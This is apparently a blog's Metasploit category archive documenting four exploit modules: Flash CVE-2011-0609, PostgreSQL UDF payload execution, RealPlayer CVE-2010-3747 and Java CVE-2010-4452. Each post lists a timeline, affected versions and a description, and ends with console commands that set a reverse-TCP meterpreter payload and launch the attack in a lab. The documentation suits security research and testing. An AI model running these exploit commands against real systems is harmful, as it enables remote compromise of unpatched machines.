Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published the 2011-03-11
Security Advisory APSA11-01 posted by the vendor the 2011-03-14
First vulnerability analysis provided by villy the 2011-03-15
Metasploit PoC provided by bannedit the 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time

sysinfo
getuid

PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Exploits, Metasploit,

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-04-01
Metasploit PoC provided by todb the 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows PostgreSQL, before or equal to 8.4.x 32-bit.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLL’s from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-10-15
Saint PoC provided the 2010-10-22
Metasploit PoC provided the 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid